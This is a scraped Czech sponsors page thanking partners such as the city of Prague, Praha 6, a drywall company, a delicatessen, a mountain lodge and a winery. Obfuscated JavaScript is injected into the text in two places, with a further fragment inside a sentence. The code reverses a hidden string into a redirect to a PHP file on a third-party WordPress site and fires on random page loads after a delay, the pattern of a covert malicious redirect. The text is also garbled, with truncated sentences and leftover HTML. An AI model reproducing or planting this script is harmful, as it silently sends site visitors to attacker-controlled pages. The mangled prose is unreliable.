Partners

Many thanks to all our partners

$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}p“>Praha je hlavním městem České republiky a 14. největším městem Evropské unie. Do dnešní podoby se Praha vyvíjela jedenáct století. V současnosti se rozkládá na území 496 čtverečních kilometrů a má přes 1,2 milionu obyvatel.

Praha je všeobecně považována za jedno z nejkrásnějších měst v Evropě. Historické centrum města s jedinečným panoramatem Pražského hradu, největšího hradního komplexu na světě, je památkovou rezervací UNESCO.

Partnerství hl. m. Prahy v oblasti kultury, cestovního ruchu, sportu, volného času a volného času dětí a mládeže je nástrojem podpory akcí, které pořádají subjekty působící v Praze v uvedených oblastech, a mezinárodních a tematicky prioritních akcí v uvedených oblastech.

Praha 6 st a rozmanitost její přírody. Mezi nejvíce navštěvovaná místa patří Divoká Šárka, Kozí hřbety a Sedlecké skály.

Přestože se většina jejího území stala součástí hlavního města až v roce 1920, patří Praha 6 mezi nejžádanější lokality pro bydlení, administrativu i diplomatická a obchodní zastoupení.

www.praha6.cz

ŠermCZ www.sermcz.cz

$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}p“>Hlavní činností stavební firmy Černý a Černý Sádrokartony spol. s r.o. je dodávka a montáž suchých staveb, sádrokartonových konstrukcí, minerálních podhledů, akustických podhledů a obkladů, zateplování podkroví a to v reprezentativní kvalitě se standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andardní zárukou na provedené práce 36 měsíců.

Firma vznikla v roce 1990 původně jako sdružení fyzických osob. V roce 1996 byla založena společnost s ručením omezeným.

MP Lahůdky www.mplahudky.cz

uš“ width=“180″ height=“120″ /> poskytují klidné prostředí pro aktivní odpočinek a relaxaci, nebo perfektní podmínky pro sportovní soustředění.

Bouda Mato nabízí pobyt v turistické třídě s lůžkovou kapacitou 15 lůžek. V areálu střediska se nachází 800 m dlouhý lyžařský vlek s převýšením 127 m s obtížností modré barvy. V zimní sezóně Friesovy boudy protíná Krkonošská lyžařská cesta, která vede krkonošskými hřebeny v délce 90,5 km a je neustále upravována rolbami.

Dobré vinařství se nebojíme nabízet výsledky jejich poctivé práce. Je to pro nás radost – tahle vína totiž pijeme i my a moc nám chutnají.

Dobré vinařství ve svém e-shopu nabízí výběr kvalitních červených, bílých a růžových tichých vín z Velkopavlovické podoblasti včetně vín oceněných v národních a mezinárodních vinařských soutěžích.

www.dobrevinarstvi.cz

Děkujeme!